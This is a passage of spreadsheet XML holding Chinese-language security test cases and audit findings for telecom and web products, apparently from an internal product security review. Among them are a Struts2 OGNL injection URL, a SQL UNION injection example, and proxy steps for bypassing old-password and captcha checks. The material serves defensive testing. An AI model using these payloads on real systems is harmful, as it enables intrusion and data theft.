问题4（致命）：Portal系统所有的账户登陆口令都加密存储在Oracle数据的库中，查询数据库中的口令数据(select * from vpuser.ppc_groupuser)，将存储的登陆口令密文经过base64解码后为128bit的加密数据。
问题5（严重）：CA部件 CA PC登陆Mysql数据库用户名/密码明文存在配置文件中。
问题6（严重）：T3000目录下有4个bat（gt.bat,hba.bat,install.bat,）及Lego平台使用的Certinvoke.bat文件中明文存储超级管理员用户名及密码。5个bat 文件中明文记录超级管理员的密码
问题7（一般）：系统中LMT/STELNET/SFTP/TELNET/FTP/串口/SNMP配置的用户密码保存使用SHA256但没有加盐值
问题8（一般）：系统口令都使用huawei作为盐值进行加密
问题9（一般）：1）进入系统管理员配置页面；2）查看request返回的详细信息，发现返回了系统管理员信息表T_OSS_ADMININFO表的所有内容，其中包含口令密文，并且包含root用户的口令密文；</t>
  </si>
  <si>
    <t>1.没有使用rand伪随机函数。
2.使用srand函数产生时，要保证随机种子不会被预测。
3.其他方式产生的随机值也要保证真正意义上的随机，可以参考修复建议来进行。</t>
  </si>
  <si>
    <t>1、反复建立、断开SSL连接，连续20次以上
2、查看CPU使用率，内存占用率
3、查看系统日志</t>
  </si>
  <si>
    <t>1.网元运行正常
2.客户端与网元连接正常</t>
  </si>
  <si>
    <t>1、开启工具；
2、使用ssl/TLS通道与设备通信；
3、将HookME中抓取的SSL/TLS流程包（client hello、server hello、certificate、change cipher spec）中的mac地址修改为错误的Mac地址重新发送；
4、检查是否会收到告警类型为bad_record_mac的告警消息；
ContentType为0x15 Alert</t>
  </si>
  <si>
    <t>1、客户端使用低版本连接被测设备：
a)如果设备仅支持TLS1.3，客户端使用TLS1.2及以下版本连接设备
b)如果设备仅支持TLS1.2，客户端使用TLS1.1及以下版本连接设备
c)如果设备仅支持TLS1.1，客户端使用TLS1.0
d)如果设备仅支持SSLV3，客户端使用SSLV2连接设备</t>
  </si>
  <si>
    <t>1.系统运行正常
2.获取系统应用的用户名密码
3.APPSCAN的LICENSE</t>
  </si>
  <si>
    <t>1.启动Wireshark进行嗅探；
2.访问最终用户登录页面，输入用户名和口令进行登录；
3.查看Wireshark的嗅探记录，选择目的IP为服务器IP）的记录，右键并点击“Follow TCP Stream”，检查是否能够看到明文的口令/密码。
注：只提供本地接入或本地登录，用来做设备管理使用的场景可以不测，windows嗅探工具使用Wireshark，Suse使用tcpdump， solaris使用snoop。</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.客户端正常查询个人机密数据
3.配置完成抓包工具</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.系统对用户的输入进行边界限制，且边界问题会导致系统安全问题。</t>
  </si>
  <si>
    <t>1.进入登录页面
2.输入如下语句：
http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D
注：斜体部分为可更换部分</t>
  </si>
  <si>
    <t>1.应用运行正常
2.系统使用struts2框架</t>
  </si>
  <si>
    <t>1.登陆网站， 进入密码修改页面
2.在修改密码页面，输入旧密码，新密码信息，并提交修改
3.使用WEB代理工具拦截消息，观察是否客户端是否提交用户名或用户ID，如果是则修改为其他用户名或用户ID，看看是否能够成功修改其他用户的密码，如果可以则存在漏洞。</t>
  </si>
  <si>
    <t>1.Web业务正常运行
2.系统提供修改密码的功能
3.已知系统正确的账号
4.配置完成WEB代理工具</t>
  </si>
  <si>
    <t>系统对用户的锁定时长可设置
注：对系统超级管理员帐户不建议锁定</t>
  </si>
  <si>
    <t>1.以管理员登录系统
2.进入应用的配置界面，检查“允许连续失败的次数”是否可配置
3.连续登录失败锁定策略的“允许连续失败的次数”可配置，取值范围：有验证码机制的产品可以为0-*次（0表示不启动锁定功能），无验证码机制的产品未1-*次</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.已知系统帐号及密码
3.获取验证码识别工具</t>
  </si>
  <si>
    <t>1.打开登录界面，输入用户名，密码，验证码等，并提交登录
2.使用WEB代理工具拦截登录消息，客户端如果存在记录登录次数的字段，将该字段删除。
3.提交请求，观察服务端响应。</t>
  </si>
  <si>
    <t>方法一：
1.打开被测系统的登录页面；
2.在登录界面中输入正确的帐号、密码信息，提交登录
3.在WEB代理工具中拦截的消息，修改认证信息为错误的内容，或者删除认证相关信息
方法二：
1.打开登录界面，输入用户名密码。
2.关闭WEB容器，然后点登录</t>
  </si>
  <si>
    <t>1、日志文件大小达到阀值时产生报警或进行合理处理
2、日志记录了日志的删除或覆盖
3、重要日志删除或覆盖时会进行备份</t>
  </si>
  <si>
    <t>1.不管新开发产品还是定制补丁版本都没有使用有专利/私有加密算法。
2.禁止使用当前已知的不安全的密码算法，标准协议定义且没有替代算法的或需要与第三方系统对接的除外，不建议使用存在安全风险的密码算法。
如需要与第三方系统对接或兼容老系统，产品支持使用不安全密码算法的情况，应在产品CPI资料中提示风险。---此条不作为2013年产品网络安全红线落地安全稽核的处罚依据，但会作为产品的安全风险项提出。</t>
  </si>
  <si>
    <t>1、工具使用：
   1）使用CodeCC中的Fortify和Coverity，能扫出部分加密算法问题的代码；
   2）使用Nmap调用加密算法的套件，能扫出部分加密算法的问题；
2、人工代码走读：
   1）、Openssl里的对称算法标识（如：EVP_aes_128_ecb()），禁止包含"ecb"字样
   2）、iPSI里的对称算法标识（如：ALGID_AES256_ECB()），禁止包含"ecb"字样
   3）、Java里Cipher.getInstance("AES")，其中"AES"默认是ECB模式，应禁止使用
   4）、Java里Cipher.getInstance("AES/ECB/NoPadding")，禁止包含"ecb"字样</t>
  </si>
  <si>
    <t>密码算法的安全性是基于密钥的， 如果密钥泄露，攻击者可以轻易的使用密钥解密密文信息，加密机制将完全失效。如果密钥、共享秘密明文传输，攻击者可以通过简单的网络嗅探就能获取密钥并解密密文数据，数据加密传输安全机制就会完全失效；密钥在传输过程中如果被恶意篡改，将导致解密出的数据错误，如果应用系统使用错误的解密结果进行数据处理，将可能使程序进入不可预期的运行状态，损害应用程序的正常运行。
1、检查非信任网络中传输的对称密钥、共享秘密（如：预置共享密钥、PBKDF中的口令等）是否进行了加密（如：使用对称和非对称加密算法）;
2、检查非信任网络中传输的对称密钥、共享秘密（如：预置共享密钥、PBKDF中的口令等）是否进行了完整性保护（如：使用MAC或签名算法）;</t>
  </si>
  <si>
    <t>1.密钥协商过程中如果使用了不带身份认证的DH算法，则之前一定先进行了身份认证
2.或者密钥协商使用了带身份认证的算法</t>
  </si>
  <si>
    <t>1、分别使用普通账号、管理员账号登陆系统，看能否使用个人数据导出或转移功能。
2、使用独立的具有个人数据导出功能权限的账号登陆系统，执行导出功能。之后查看系统日志，看是否有导出操作的相关记录。
3、查看导出的个人数据，看是否对敏感的个人信息进行过滤或匿名化处理。</t>
  </si>
  <si>
    <t>2、若不在第1步的结果中，直接pass；反之需执行第3步
3、对开发不能说清楚为什么某个Authority权限设置不全的，需要提单；并将所有的分析和确认结果放入《ContentProvider确认表.xlsx》（若这个表中已经有前期的确认结果，这里可以不用重复确认）</t>
  </si>
  <si>
    <t>1、联网可通过app名称来提示用户，比如浏览器、导航地图、新闻类应用、XXX云、天气等，可不单独提示联网。即时通讯类应用在登录后才可联网，一旦登录联网不作约束
2、上述类别应用，如果有用户协议提示联网，则必须满足在用户同意后才能联网
3、该行为对应权限
android.permission.CHANGE_WIFI_MULTICAST_STATE
android.permission.CHANGE_WIFI_STATE
android.permission.CHANGE_WIMAX_STATE
android.permission.INTERNET
android.permission.CHANGE_NETWORK_STATE</t>
  </si>
  <si>
    <t>1、检查LBE是否提示应用后台开启移动网络开关。如无提示，则测试通过。如有提示，需检查在LBE提示前，应用本身是否事前提示用户后台开启移动网络开关（可以通过弹框的方式或者在用户协议中声明）。如无提示则测试fail
3、如果应用真正退出，则测试通过
4、LBE不会弹出后台更改移动网络开关、WIFI开关或者蓝牙开关的提示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</si>
  <si>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4、放置15分钟，在其间进行灭屏亮屏、休眠唤醒、网络断开再连接等操作，观察LBE是否可以检测出后台录音行为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</si>
  <si>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4、放置15分钟，在其间进行灭屏亮屏、休眠唤醒、网络断开再连接等操作，观察LBE是否可以检测出后台发送短信/彩信行为</t>
  </si>
  <si>
    <t>1.获取到源代码。
2.使用RSA非对称加密算法。</t>
  </si>
  <si>
    <t>1、使用生成证书功能，查看RSA密钥对位数是否可选，默认是否为2048位或以上；查看签名使用的hash算法是否可选，是否默认使用sha256或更复杂的hash算法。
2、查看系统中所使用证书的RSA公钥字段，是否为2048位或以上；查看证书签名算法字段，是否为sha2RSA或更复杂的算法。</t>
  </si>
  <si>
    <t>1、业务中使用密钥。
2、密钥不再使用</t>
  </si>
  <si>
    <t>密码安全是基于密钥安全的， 密钥的损坏或丢失将造成密文信息无法解密，无法解密的密文信息即可认为数据被不可逆转的损坏，高价值或关键数据的损坏是应用系统无法接受的，所以必须为加密高价值和关键数据的密钥提供密钥的备份和恢复机制。
产品可根据实际业务场景或客户需求分析是否符合要求：
1、检查对需要备份的密钥是否设计和实现了密钥备份的功能，是否制定了密钥备份的规定。</t>
  </si>
  <si>
    <t>1、打开自研XX应用，进行联网操作，同时使用TCPDump抓IP LOG。
2、利用wireshark打开，在Filter中输入ssl，在client hello消息中找到Cipher Suites，检查是否包含RC4的加密算法，比如：TLS_RSA_with_RC4_128_MD5中包含RC4</t>
  </si>
  <si>
    <t>3、不能包含这些数据。若有这些数据，则在界面上需要有相关明示提醒
4、IP log中包含的预制条件3中的个人数据或敏感数据需要采用安全通道传输或加密后传输（安全算法有：SHA,HMAC-SHA,AES,RSA,ECC,DSA,ECDSA,DH；1、对于个人数据保护测试遵循的原则为先检查隐私声明中是否有声明要采集的信息（没有声明或者声明不清楚则为问题），然后检查上传用户数据的通道是否是安全通道，在检查传输的数据有没有加密（如果安全通道传输则加不加密都不是问题，如果不是安全通道则数据需要加密否则就是问题），但是要注意国内产品只明文传输IMEI、IMSI、手机号等属于个人数据非敏感数据即非问题，如果传输这些数据的同时还在传输个人的图片、视频、联系人等组合起来构成敏感数据则为问题；如果产品未海外国家产品则IMEI、IMSI、手机号等也不能单传；）</t>
  </si>
  <si>
    <t>1、检查XX特性的AndroidManifest.xml，是否有android.permission.send_sms权限
2、第一次打开被测应用，检查是否有短信发送的界面或提示
3、激活应用后，正常使用几分钟，查看手机管家是否提示该应用有发送短信的行为</t>
  </si>
  <si>
    <t>1、Android手机上已安装最新的Macfee Android版应用，保持默认设置
2、插入一张有数据业务的现网卡并打开数据业务</t>
  </si>
  <si>
    <t>1、打开客户端，检查不输入口令或者输入错误的口令是否登录失败
2、使用search and replace搜索客户端软件包及其安装文件，检查是否存在空口令或被质疑成空口令的内容
3、反编译apk软件包，使用jd-gui.exe搜索口令关键字，检查是否存在空口令或被质疑成空口令的内容</t>
  </si>
  <si>
    <t>所有认证/访问方式都可管理，系统不存在不可管理的认证/访问方式（包括用户不可管理的帐号，人机接口以及可远程访问的机机接口的硬编码口令，不经认证直接访问系统的接口、不开放给用户但是对用户有影响的管理入口等）。
备注：本处需要设计、开发、测试在自检表上签字。</t>
  </si>
  <si>
    <t>采用NGSSQuirreL进行检查，方法如下：
1.运行数据库对应的NGSSQuirreL软件（例如Oracle对应NGSSQuirreL for Oracle）。
2.根据扫描向导“Scan Wizard”配置扫描对象。
  以Oracle为例：
  第一步，直接点击“Next”按钮；
  第二步，在“Host”中填要扫描的IP地址，在“Port”中填写Oracle的监听端口（默认为1521），点击“Next”按钮；
  第三步，根据实际情况配置Oracle Listener的密码，然后点击“OK”按钮（如果没有设置密码则直接点击“Cancel”按钮）；
  第四步，点击下拉列表框选择要扫描的数据库实例，然后点击“OK”；
  第五步，在“Username”中填“system”，在“Password”中填system用户的实际密码（默认是manager），如果“Instance”为空，则填入要扫描的Oracle实例名，然后点击“Next”按钮；
  第六步，点击“Scan”按钮，开始扫描。
3.扫描工具窗口底部的状态栏显示“Scan Finished”，表明扫描结束了，点击“File”菜单，选择“Export Report to”-“HTML File”，输出扫描报告。
4.查看数据库扫描报告。</t>
  </si>
  <si>
    <t>1、只有特定的管理员用户拥有执行恢复默认配置的权限。
2、如果其他用户可以执行恢复默认配置操作，则此操作仅应将系统功能相关配置恢复默认，用户管理相关功能不应恢复。</t>
  </si>
  <si>
    <t>1.创建SFTP账户，把目录盘符设置成系统根目录（linux系统）或者系统盘符根目录（windows系统）。
2.创建SFTP账户，把目录盘符设置成一个较低层级的目录。
3.使用SFTP账户正常登录，尝试登录其主目录以外的目录，看是否可以成功打开目标目录。</t>
  </si>
  <si>
    <t>1.以某用户登录系统，并访问任意功能菜单（比如：修改密码），拷贝IE地址栏中的URL地址，获取当前会话（例如使用webscarab/burpsuite等工具抓取请求复制cookie）；
2.直接关闭IE浏览器；
3.重新打开IE浏览器（部分浏览器自带历史记录能力，需要先行清空历史记录），在URL地址栏中粘贴步骤1拷贝的URL，并按回车，查看是否能够正常访问该URL对应的页面及信息；
4.开启webscarab/burpsuite代理工具对http进行拦截，修改请求中的cookie为步骤1中的cookie内容，放通修改后的请求，查看是否能够正常访问该URL对应的页面及信息。</t>
  </si>
  <si>
    <t>1、系统运行正常，且提供忘记密码功能
2、获取产品文档</t>
  </si>
  <si>
    <t>1、最低标准系统应可以限制总的在线用户数。
2、推荐的做法：系统可以限制总的在线用户数，且可以限制不同用户名的在线用户数。</t>
  </si>
  <si>
    <t>1、查看产品详细设计文档，结合对开发人员的访谈，看产品预共享密钥认证的设计实现是否包含下述预防反射攻击的方法：
（1）认证双方采用各自不同的预共享密钥。
（2）认证双方使用不同类型的挑战值。例如：认证发起方发给认证接收方的挑战值的类型为整形，而认证接收方发给认证发起方的挑战值的类型为字符串型。
（3）在加密的认证消息中包含目标实体的身份标识符。
（4）在传递的认证消息中，双方额外添加不同的字符串。例如：客户端发给服务端的消息中添加1100，而服务端发给客户端的消息中添加0011，以分别代表是客户端发送和服务端发送的数据。
（5）对于同一个客户端，在完成一次完整的握手之前，不允许服务端对客户端发起新的认证请求。
（6）在认证中，认证只能由固定的一方发起。</t>
  </si>
  <si>
    <t>问题1（致命）：产品SIMLOCK算法疑似为私有算法，且SIMLOCK解锁工具由华为自研，并由华为自己管控，未向运营商公开或受限公开。建议：关于华为自己管控的生成口令的工具也要向运营商或监管机构公开或受限公开，同时该工具要使用安全的加密算法生成口令。
问题2（致命）：在Web登录页面，Admin用户的密码采用BASE64编码，能被成功破解。请使用安全算法如SHA256、安全方式SSL等进行加密传输与认证。
问题3（致命）：本地升级及TR069远程升级时采用了crc进行校验，对在线升级采用MD5校验，不满足软件完整性校验要求。建议：产品的软件包（含补丁包）必须提供完整性校验机制（至少采用Hash + 盐值的方式，推荐使用数字签名），在升级过程中对软件包进行完整性验证，防止软件被篡改。</t>
  </si>
  <si>
    <t>问题1（致命）：登录FC节点所在的操作系统，执行psql -U galax -d vrm，输入错误的用户密码。多次输入后，无锁定机制。
问题2（一般）：Portal页面是整个软件最重要的客户界面和管理界面。该页面的登陆防暴力破解机制是用户输入密码连续错误3次就锁定对应账号（默认设置30mins），由于没有校验码机制，攻击者可以在远程简单的通过工具构造并发送任意已知账户的密码错误的登陆报文3次，即可使指定账户被Portal系统锁定，导致该账户不可用，包括系统的超级管理员账户。</t>
  </si>
  <si>
    <t>1、产品禁止使用通过界面上、工具或API接口提供私钥导出功能；
2、产品必须对私钥文件做严格的文件权限控制，防止非授权用户通过文件读取、下载这些操作系统通用接口获得数字证书私钥。</t>
  </si>
  <si>
    <t>问题1（致命）：UI界面，管理员修改自身密码未验证自身旧密码；管理员修改自身密码需要先验证旧密码，再设置新密码。
问题2（致命）：管理员级别用户可以执行MOD OP命令修改自身口令而无需验证旧口令，与WebLMT提供的修改口令窗口不符，违反了口令安全要求。
问题3（致命）：SC部件 SC用户侧系统可以重置用户自身密码不需要输入旧密码。 
问题4（致命）：web页面修改管理员口令需要验证旧口令。但是当把报文中的oldpasswd字段删除后，服务端就不校验旧密码了。去掉oldpasswd字段的报文，释放后可以直接修改用户口令。
问题5（严重）：1)缺省未开启BIOS的登录认证，需要进入BIOS通过identifyset命令开启认证，passwordset命令修改登录密码。2)进入BIOS，在不开启认证的情况下执行passwordset命令设置认证密码不用校验旧密码。BIOS命令行手册中存在描述，passwordset命令执行后需要校验旧密码，与实际不符。</t>
  </si>
  <si>
    <t>1.删除管理员成功
2.被删除的管理员信息也被删除，不可以用字段来标记删除的用户</t>
  </si>
  <si>
    <t>1、产品资料对高危操作或命令的应用场景描述清晰，并对可能造成的后果提示明确。
2、使用高危操作或命令时，有实时的危险性提示。</t>
  </si>
  <si>
    <t>1.通过源代码分析产品功能，识别出协议认证、密钥产生等重要功能的代码。
2.分析这些功能是否用到随机数来产生最后的认证凭证等。
3.如果使用了随机数，则分析随机数是否可被预测。</t>
  </si>
  <si>
    <t>1、开启工具；
2、使用ssl/TLS通道与设备通信；
3、将HookME中抓取的SSL/TLS流程包（application Data）中的加密数据字节数修改为超过2^14+1024，重新发送；
4、检查是否会收到告警类型为record_overflow的告警消息；
ContentType为0x15 Alert</t>
  </si>
  <si>
    <t>1.源代码不含硬编码明文口令
2.客户端输入/显示口令时，不能将口令缓存在CS客户端的源/临时文件 中</t>
  </si>
  <si>
    <t>1、检查应用系统所有可能显示口令/设置口令的界面（浏览器界面、手机终端、IM客户端或其他客户端显示窗口等）是否明文显示口令；
2、检查日志（客户端显示日志界面、本地日志、服务器记录日志等）是否包含明文口令；
3、在客户端提交登录请求，登录成功后，启动winhex.exe读取客户端所在操作系统内存，搜索当前内存内容中是否有刚才提交的明文口令；
4、检查cookie、调试跟踪信息是否明文显示口令
5、在客户端提交登录请求，登录成功后，启动winhex.exe读取客户端所在操作系统内存，搜索当前内存内容中是否有刚才提交的明文口令；” 改为“在客户端提交登录请求，登录成功后，启动winhex.exe读取客户端所在操作系统内存，搜索当前内存内容中是否有刚才提交的明文口令；
注：设置口令的测试可参考操作员、程序账号、最终用户中列举的常见口令修改场景</t>
  </si>
  <si>
    <t>1.以最终用户登录系统，访问修改口令/密码的页面；
2.启动Wireshark进行嗅探；
3.进行修改口令/密码的操作；
4.查看Wireshark的嗅探记录，选择目的IP为服务器IP）的记录，右键并点击“Follow TCP Stream”，检查是否能够看到明文的口令/密码。
注：只提供本地接入、登录，做设备管理使用的场景可以不测，windows嗅探工具使用Wireshark，Suse使用tcpdump， solaris使用snoop。</t>
  </si>
  <si>
    <t>1.系统正常运行
2.已知系统用户名口令
3.配置完成抓包工具</t>
  </si>
  <si>
    <t>1.进入Web系统；
2.启用WEB代理服务器；
3.业务处理经过多个步骤，依次操作，并记录最后一个步骤的请求消息。退出系统；
4.重新进入系统，直接绕过其它步骤，将记录的最后一个步骤的请求消息发给服务器端，进行业务操作；</t>
  </si>
  <si>
    <t>1.应用运行正常
2.系统使用apache struts 2.0.0-2.3.14.1</t>
  </si>
  <si>
    <t>1.进入系统查询数据场景中，构造UNION查询。
2.执行的查询 如下：SELECT Name, Phone, Address FROM Users WHERE Id=$id
设置以下 ID 值：$id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCarTable。
将得到以下查询：SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROMCreditCarTable
UNION查询的数据表及查询字段根据业务实际情况构造。</t>
  </si>
  <si>
    <t>1.以管理员登录系统
2.进入应用的配置界面，检查“锁定时长”是否可配置。
3.锁定时长可配置：取值范围：0-999（可根据实际场景确定） 分钟，当取值为 0 时，表示无限期锁定，建议默认：30 分钟（可根据实际场景确定）。
注：需要测试操作员账号、最终用户账号</t>
  </si>
  <si>
    <t>1.打开登录界面，输入用户名，密码，验证码等，并提交登录
2.使用WEB代理工具拦截登录消息，检查验证码信息是否能够被客户端关闭，例如，删除登录消息体中的“vcode=1234”或“checkcode=1”，则系统不再校验验证码，</t>
  </si>
  <si>
    <t>1、对于web系统，1）使用APPSCAN扫描工具对WEB安全性进行扫描，配置扫描线程数为1。2）长时间扫描并观察日志文件大小达到一定阀值（接近磁盘容量大小时）系统是否有报警提醒机制。
2、对日志进行删除或覆盖操作，检查日志文件对日志的覆盖或删除是否记录
3、（可选）重复执行可导致日志记录的重要操作，达到日志写满后检查重要日志的删除或覆盖是否会进行旧日志的备份。</t>
  </si>
  <si>
    <t>1.网络运行正常
2.目标系统运行正常</t>
  </si>
  <si>
    <t>1、CodeCC扫描和人工代码走读发现是按下列操作说明安全：
   1）、3DES的密钥长度达到128bit
   2）、在3DES如果使用的192bit的密钥长度，则密钥的前64bit、中间64bit、后面64bit的数据不存在重复现象
   3）、3DES的三次密钥K1、K2、K3不相等；
2、Nmap加载加密算法插件也没有扫描相关的问题，说明安全；</t>
  </si>
  <si>
    <t>1、工具使用：
   1）使用CodeCC中的Fortify和Coverity，能扫出部分加密算法问题的代码；
   2）使用Nmap调用加密算法的套件，能扫出部分加密算法的问题；
2、人工代码走读：
  1)、IV是否是安全随机数
  2)、IV不能固定（如：写死在代码里）
  3)、禁止使用前一次加密的最后一个密文分组数据作为下一次加密的IV（这是针对TLS 1.0的BEAST攻击的根因）
  4)、IV不能写在配置文件里，且每次加密后都应更新
  5)、IV不能使用某些固定属性，如：某些ID</t>
  </si>
  <si>
    <t>目的和意义：
随机数是密码学的基础，密钥的随机性确保攻击者无法猜测密钥，也就无法解密密文；盐值的随性确保攻击者无法执行预计算操作，也就无法构造彩虹表进而还原口令明文；IV的随机性确保攻击者无法找出密文的统计学特性，也就无法进行密文替换攻击或注入攻击。如果随机性无法保证，上面提到的各种攻击都能奏效，系统的安全性就会受到极大威胁。
子检查项：
1、禁止使用C标准库函数random()、rand()生成随机数用于安全用途
2、禁止使用Java的java.util.Random类生成随机数用于安全用途
3、使用java.security.SecureRandom()产生随机数时，禁止每次都设置了相同的种子，这将导致每次产生的随机数都一样</t>
  </si>
  <si>
    <t>1、查看产品资料，看证书管理部分是否提供预置华为证书私钥的导出方法。
2、登陆设备，看是否提供查看私钥内容的接口或命令。
3、如果私钥以文件形式存在，看是否可以查看文件内容，是否能够导出或下载私钥文件。
另外，私钥属于敏感信息，在系统中应该加密保存，并提供严格的访问控制机制。</t>
  </si>
  <si>
    <t>1、通过Wireshark抓包分析SSL业务报文，检查握手阶段协商的加密算法如果使用了DH等不带身份验证的算法，如果是确认是否先进行了身份认证
2、或分析SSL/TLS通信握手阶段密钥协商过程的代码，检查是否采用了带身份认证的算法进行</t>
  </si>
  <si>
    <t>1、用mercury工具查看系统内所有定义了content provider但没设置权限的应用(即命令：run app.provider.info -p null &gt; D:\provider.txt)
2、检查所测试的应用是否在第1步的结果中（在D:\provider.txt 中搜索应用的包名）
3、逐个分析被测应用在provider.txt中的每个Authority的安全性风险，涉及敏感信息的需要开发逐个说明理由</t>
  </si>
  <si>
    <t>该行为对应权限
android.permission.CHANGE_WIFI_MULTICAST_STATE
android.permission.CHANGE_WIFI_STATE
android.permission.CHANGE_WIMAX_STATE
android.permission.INTERNET
android.permission.CHANGE_NETWORK_STATE</t>
  </si>
  <si>
    <t>1、检查LBE是否提示应用后台联网。如无提示，则测试通过。如有提示，需检查在LBE提示前，应用本身是否事前提示用户后台联网（可以通过弹框的方式或者在用户协议中声明）。如无提示则测试fail
注意：联网包括数据业务联网以及wifi联网，若包含以上联网功能，需要在用户协议中或弹框提示中全部说明，如果只提示其中一种，不合格
3、如果应用真正退出，则测试通过
4、LBE不会弹出后台联网提示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</si>
  <si>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4、放置15分钟，在其间进行灭屏亮屏、休眠唤醒、网络断开再连接等操作，观察LBE是否可以检测出后台更改移动网络开关、WIFI开关或蓝牙开关的行为</t>
  </si>
  <si>
    <t>1、用户协议界面提示为正面提示。比如：不符合规范：“在用户未授权的情况下，终端不会收集用户的联系人信息，通讯记录”
符合规范：“在应用使用过程中，终端会收集用户的联系人信息，通讯记录”</t>
  </si>
  <si>
    <t>1、系统生成证书时，默认RSA密钥对为2048位或以上，默认签名算法为sha256或更复杂。如果支持生成算法复杂度低的证书，要给出安全警告提示。
2、系统所使用的证书，RSA公钥为2048位或以上，签名算法为sha2RSA或更复杂。</t>
  </si>
  <si>
    <t>如果不再使用的密钥没有立即删除，针对不再使用的密钥又存在管理漏洞，攻击者可能获取不再使用的密钥和使用该密钥加密的密文数据，然后攻击者可以利用密钥解密密文数据，造成信息泄露。如果不再使用的密钥被立即删除，即使攻击者可以获取对应的密文信息，也无法解密，从根本上切断了信息泄露的源头。密文数据可能分散保存在应用系统中或系统外的不同位置，在密钥不在使用后，销毁不同位置的密文以避免信息泄露较为困难。
检查密钥的销毁是否符合要求：
1、对于内存中的密钥，是否对保存密钥的内存空间填充了其他值。（如：全0）
2、对于本地存储（本地文件、数据库等）的密钥（通常以密文形式存在），是否被完全删除（包括密钥的全部副本）并对相应的磁盘空间重复写入其他数据（推荐写“0”或“1”覆盖三次或以上）</t>
  </si>
  <si>
    <t>1.能获取到源代码
2.使用密钥加密数据</t>
  </si>
  <si>
    <t>1、打开服务器非自研的XX应用，进行联网操作，同时使用TCPDump抓IP LOG。
2、利用wireshark打开，在Filter中输入ssl，在client hello消息中找到Cipher Suites，检查是否包含RC4的加密算法，比如：TLS_RSA_with_RC4_128_MD5中包含RC4</t>
  </si>
  <si>
    <t>1、有现网的移动数据连接，并勾选“始终连接数据业务”
2、手机插在PC上（防止休眠）</t>
  </si>
  <si>
    <t>1、安装McAfee Android杀毒软件到手机，对手机进行安全扫描和实时监控
2、运行应用XXX一段时间
3、检查是否有恶意广告行为</t>
  </si>
  <si>
    <t>1、有短信发送权限；若无send sms权限，则忽略后续步骤，用例直接pass
2&amp;3、若第2步无短信发送界面或提示，第3步有短信发送行为，则存在用户不知情下发短信的行为，即短信恶意扣费</t>
  </si>
  <si>
    <t>PC上已安装Java SDK的环境，配置好了Java SDK的环境变量；
已安装Python；
重新升级一下设备的版本，确保是干净的，需要root权限，已内置了busybox</t>
  </si>
  <si>
    <t>1、打开McAfee选择安全扫描-&gt;立即更新
2、选择安全扫描-&gt;立即扫描</t>
  </si>
  <si>
    <t>1.根据产品描述or其他设计文档or开发自检，梳理产品所有的访问入口及跳转位置；
2.收集版本历史中所有对内对外接口的访问方式（尤其请注意定制类接口和版本变更过程中改名或者废弃的接口）
测试方法：访谈orSE确认or产品实际功能测试工具测试</t>
  </si>
  <si>
    <t>1、使用空口令无法登录
2、不允许存在空口令或可被质疑成空口令的内容。模板和帮助文档中可以使用password=******的方式来替代可疑空口令。</t>
  </si>
  <si>
    <t>1.SMTP服务未将邮件发送到cc或bcc之后的邮箱地址。
2.应用程序返回的错误信息与电子邮箱功能无关。
3.生成的相关请求的HTML表单不包含任何可利用的信息。
4.应用程序不存在SMTP注入漏洞。</t>
  </si>
  <si>
    <t>1、以oracle用户登录系统；
2、使用sqlplus登录，命令如下：sqlplus '/as sysdba'；
3、通过命令检查参数REMOTE_LOGIN_PASSWORDFILE是否设置为NONE，命令如下：Show parameter REMOTE_LOGIN_PASSWORDFILE；
4、检查$ORACLE_HOME/network/admin/sqlnet.ora文件中参数SQLNET.AUTHENTICATION_SERVICES是否被设置成NONE。</t>
  </si>
  <si>
    <t>1、查看是否所有用户都有权限执行恢复默认配置操作。
2、查看恢复默认配置之后，是否存在默认账号、默认口令可以直接登录系统。</t>
  </si>
  <si>
    <t>1、删除应用帐号时，与该帐号的权限相关的所有属性同时删除或使之失效，不再可以重用。
2、新建应用帐号时，如果帐号与某个已经删除的帐号名称相同，则不能继承已删除帐号的所有信息（如个人信息、认证信息、授权信息等）。</t>
  </si>
  <si>
    <t>1、使用管理员账号登陆系统。
2、查看用户管理页面（或命令行配置），看是否可以设置同一用户名同时在线的用户数量。
3、尝试新建大量用户，看系统是否限制最大用户数。</t>
  </si>
  <si>
    <t>问题1：提示输入用户名时，输入不合法的用户名。出现用户名不合法的提示。参看DTS2014032605698
问题2（提示）：1）使用IE登录TE80的web管理页面。2）遍历登录名或密码错误提交，看提示消息。3）用户名错误时提示“用户名或密码错误”。4）密码错误时提“用户名或密码错误，允许输入错误密码次数：4（届时该账号将被锁定）”；建议用户名错误或者密码错误提示信息一致，去掉明显的差异化提示信息。</t>
  </si>
  <si>
    <t>1.使用系统删除管理员用户
2.查看后台被删除用管理员信息是否存在</t>
  </si>
  <si>
    <t>1.网络正常
2.现网系统运行正常</t>
  </si>
  <si>
    <t>1、禁止对外暴露可以访问包含敏感信息（如备忘录内容、日历存储内容等）的接口
2、禁止出于保障网络运营和服务目的提供采集最终用户原始通信内容（语音类、短信/彩信类、传真类、数据业务类）的功能，如录音、抓包，必须通过版本的形式去除（如编译宏、模块化加载，不允许采用License控制）。
3、产品禁止存在可修改任意用户口令的工具
4、产品禁止存在对包含敏感数据的文件（如包含密钥的配置文件、数据库）进行解密的自研工具</t>
  </si>
  <si>
    <t>1、收集应用所使用的所有内置账号（系统初始化安装后应用本身的初始帐号等等。）
2、检查所有内置帐号的缺省口令是否符合复杂度的要求（是否满足口令长度、口令包含字符、口令不能和用户名相同、等等基本要求）。
3、检查客户资料中是否提醒用户修改。</t>
  </si>
  <si>
    <t>1.源代码不能含硬编码明文口令
2.客户端输入/显示口令时，不能将口令缓存在Web源文件/CS客户端的源/临时文件 中：测试方法
a.BS架构，通过浏览器的查看源文件的功能，查看源文件中是否存在明文的口令
b.CS架构客户端，则检查客户端运行过程中产生的过程文件中是否有明文口令：使用窗口抓取工具（如CometAssistant.exe中的窗口SPY工具），对口令输入/显示框进行抓取，检查能否抓到明文的口令数据。
注：针对BS架构，web登录主界面无法查看“web各个菜单/子页面”的源文件时，可使用burpsuite_v1.4.01抓取URL，在Web登录主界面的另外标签页单独打开，然后查看其源文件
